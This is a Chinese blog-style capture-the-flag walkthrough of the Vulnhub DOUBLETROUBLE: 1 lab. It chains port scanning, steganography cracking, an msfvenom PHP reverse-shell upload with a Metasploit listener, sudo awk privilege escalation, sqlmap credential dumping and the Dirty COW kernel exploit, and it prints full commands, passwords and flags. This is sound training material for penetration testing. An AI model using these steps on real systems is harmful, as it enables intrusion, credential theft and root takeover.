靶机下载地址:Vulnhub——DOUBLETROUBLE: 1
- 靶机安装好以后如下图所示:
- nmap -sP 局域网IP段(扫描靶机IP地址)“因为我是用VirtualBox搭建的所以这里还是比较方便识别的”
- 拿到靶机IP
nmap -sV -A -p- -T4 10.36.101.156
扫描结果发现靶机开放了22和80端口
┌──(root💀kali)-[~]
└─# nmap -sV -A -T4 10.36.101.165
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-01 04:28 EDT
Nmap scan report for 10.36.101.165
Host is up (0.0052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:62:E5:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 5.23 ms 10.36.101.165
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds
- dirb 扫一下
┌──(root💀kali)-[~]
└─# dirb http://10.36.101.165
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 1 04:29:01 2022
URL_BASE: http://10.36.101.165/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.36.101.165/ ----
==> DIRECTORY: http://10.36.101.165/backups/
==> DIRECTORY: http://10.36.101.165/batch/
==> DIRECTORY: http://10.36.101.165/core/
==> DIRECTORY: http://10.36.101.165/css/
1. http://10.36.101.165/favicon.ico (CODE:200|SIZE:894)
==> DIRECTORY: http://10.36.101.165/images/
2. http://10.36.101.165/index.php (CODE:200|SIZE:5812)
==> DIRECTORY: http://10.36.101.165/install/
==> DIRECTORY: http://10.36.101.165/js/
3. http://10.36.101.165/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://10.36.101.165/secret/
4. http://10.36.101.165/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://10.36.101.165/sf/
==> DIRECTORY: http://10.36.101.165/template/
==> DIRECTORY: http://10.36.101.165/uploads/
---- Entering directory: http://10.36.101.165/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/batch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/ ----
==> DIRECTORY: http://10.36.101.165/install/actions/
==> DIRECTORY: http://10.36.101.165/install/css/
==> DIRECTORY: http://10.36.101.165/install/images/
5. http://10.36.101.165/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://10.36.101.165/install/lib/
==> DIRECTORY: http://10.36.101.165/install/modules/
---- Entering directory: http://10.36.101.165/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/secret/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/sf/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/template/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/actions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.36.101.165/install/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jun 1 04:29:51 2022
DOWNLOADED: 9224 - FOUND: 5
- 这时候我们去访问一下我们的靶机,访问界面是一个Welcome to qdPM,登陆方式是使用邮箱登陆,如下图:
通过dirb的结果,我们可以去发现一些信息:
在“http://10.36.101.165/secret/"目录下有一张doubletrouble.jpg
在访问”http://10.36.101.165/uploads“时目录下有一个users,这里应该是存放上传文件的目录
其它网页的信息你去一个一个点击会发现没有什么重要的了
6.我们将图片保存下来,从图片入手,有图片首先考虑有没有隐写
上工具——stegseek(工具下载链接https://github.com/RickdeJager/stegseek)
┌──(root💀kali)-[~/Desktop]
└─# stegseek ./doubletrouble.jpg /usr/share/wordlists/rockyou.txt 1 ⨯
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
查看”doubletrouble.jpg.out“发现有邮箱和密码
┌──(root💀kali)-[~/Desktop]
└─# cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
- 尝试登陆,登陆成功
- 寻找文件上传入口,最终在右上角点击下拉箭头——My Details
- 文件类型是Photo,我们直接使用工具——msfvenom自动生成(生成以后找到文件把开头的”/*“删除后再上传)
┌──(root💀kali)-[~]
└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.36.101.134 LPORT=9001 -o 9001.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34280 bytes
Saved as: 9001.php
- 访问”http://10.36.101.165/uploads/users/“,发现文件已经上传成功
- 打开msfconsole,监听本地端口(生成木马时"LPORT=端口号"),LPORT设置的是什么,options里面的LPORT就设置什么。
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.36.101.134
LHOST => 10.36.101.134
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > run
- 浏览器访问步骤11的目录,点击上传的9001.php文件,触发反弹shell
[*] Started reverse TCP handler on 10.36.101.134:9001
[*] Meterpreter session 15 opened (10.36.101.134:9001 -> 10.36.101.165:45948) at 2022-06-01 05:36:37 -0400
meterpreter > shell
Process 726 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- 接下来就是提权了,使用命令sudo -l 查看www-data用户可执行什么指令
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
- 发现sudo可执行awk,直接使用awk提权
sudo awk 'BEGIN{system("/bin/sh")}'
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
- 已经是root权限了可以为所欲为了,发现root目录下有一个doubletrouble.ova,这里应该是应了靶机的主题——DOUBLETROUBLE: 1(双重麻烦),我们将这个靶机下载下来。在shell中输入
cd /root
ls
doubletrouble.ova
python3 -m http.server 8888
在Kali中输入wget http://10.36.101.165:8888/doubletrouble.ova把靶机下载下来
┌──(root💀kali)-[~]
└─# wget http://10.36.101.165:8888/doubletrouble.ova
--2022-06-02 02:26:15-- http://10.36.101.165:8888/doubletrouble.ova
Connecting to 10.36.101.165:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 413142528 (394M) [application/octet-stream]
Saving to: ‘doubletrouble.ova’
doubletrouble.ova 100%[=====================================================================>] 394.00M 25.6MB/s in 17s
2022-06-02 02:26:33 (22.8 MB/s) - ‘doubletrouble.ova’ saved [413142528/413142528]
此时可以把1号靶机关闭,打开我们的2号靶机。
- 2号靶机开启界面如下图:
- 老样子先扫一下IP,拿到靶机的IP地址
──(root💀kali)-[~]
└─# nmap -sP 192.168.31.0/24 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-02 23:35 EDT
Nmap scan report for doubletrouble (192.168.31.75)
Host is up (0.0094s latency).
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds
- 拿到IP地址以后,扫描一下端口,发现开启了22和80
──(root💀kali)-[~]
└─# nmap -sV -A -T4 192.168.31.75
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-02 23:43 EDT
Nmap scan report for doubletrouble (192.168.31.75)
Host is up (0.0058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_ 256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/2%OT=22%CT=1%CU=36345%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=62998386%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M5B0ST11NW3%O2=M5B0ST11NW3%O3=M5B0NNT11NW3%O4=M5B0ST11NW3%O5
OS:=M5B0ST11NW3%O6=M5B0ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=
OS:3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B0NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 5.78 ms doubletrouble (192.168.31.75)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.36 seconds
- 扫描一下目录,发现只有index.php是有用的,其余回应均为403
┌──(root💀kali)-[~]
└─# dirb http://192.168.31.75
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jun 2 23:44:29 2022
URL_BASE: http://192.168.31.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.31.75/ ----
+ http://192.168.31.75/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.31.75/index.php (CODE:200|SIZE:615)
+ http://192.168.31.75/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Thu Jun 2 23:44:46 2022
DOWNLOADED: 4612 - FOUND: 3
- 访问一下index.php
- 直接开始sqlmap一把梭
┌──(root💀kali)-[~]
└─# sqlmap -u http://192.168.31.75/index.php --forms --current-db
...
current database: 'doubletrouble'
...
┌──(root💀kali)-[~]
└─# sqlmap -u http://192.168.31.75/index.php --forms -D doubletrouble --tables
...
Database: doubletrouble
[1 table]
+-------+
| users |
+-------+
...
┌──(root💀kali)-[~]
└─# sqlmap -u http://192.168.31.75/index.php --batch --forms -D doubletrouble -T users --dump
...
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+
...
- 梭哈下来发现了两组用户名和密码,通过ssh尝试登陆发现只有clapton账号可以登陆进去,登陆进去以后,在目录下发现一个user.txt,cat一下,成功拿下第一个flag
┌──(root💀kali)-[~]
└─# ssh montreux@192.168.31.75 127 ⨯
montreux@192.168.31.75's password:
Permission denied, please try again.
montreux@192.168.31.75's password:
Permission denied, please try again.
montreux@192.168.31.75's password:
montreux@192.168.31.75: Permission denied (publickey,password).
┌──(root💀kali)-[~]
└─# ssh clapton@192.168.31.75 130 ⨯
clapton@192.168.31.75's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
clapton@doubletrouble:~$ ls
user.txt
clapton@doubletrouble:~$ cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble:~$
- 通过id发现clapton不是root权限,这时想办法提权,通过查看内核版本发现漏洞
clapton@doubletrouble:~$ uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
- 上Github上搜索该内核版的信息,发现漏洞利用(漏洞利用链接:Dirtycow),将dirty.c文件上传到靶机中,通过gcc编译,然后运行,这时会生成一个用户名为 ’firefart‘ 的用户,密码是自己设置的,这里我设置的是 ‘toor’
clapton@doubletrouble:~/dirtycow-master/dirtycow-master$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~/dirtycow-master/dirtycow-master$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fioaKmuWSeBhQ:0:0:pwned:/root:/bin/bash
mmap: 7fee74040000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'toor'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'toor'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
- 通过ssh使用 ‘firefart’ 用户登陆到靶机中,查看id,是root权限,ls一下,发现两个的文件 ’logdel2‘ 和 ’root.txt‘ 直接cat ’root.txt‘ ,成功拿下第二个flag
┌──(root💀kali)-[~]
└─# ssh firefart@192.168.31.75
firefart@192.168.31.75's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 18:00:10 1969
firefart@doubletrouble:~# ls
logdel2 root.txt
firefart@doubletrouble:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:~# cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:~#
- 总结一下:靶机《DOUBLETROUBLE: 1》到这里也就全部结束了,总的来说不是很难,主要知识点,主机发现、信息收集、文件上传漏洞利用、awk提权、脏牛提权和sqlmap梭哈。
796
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
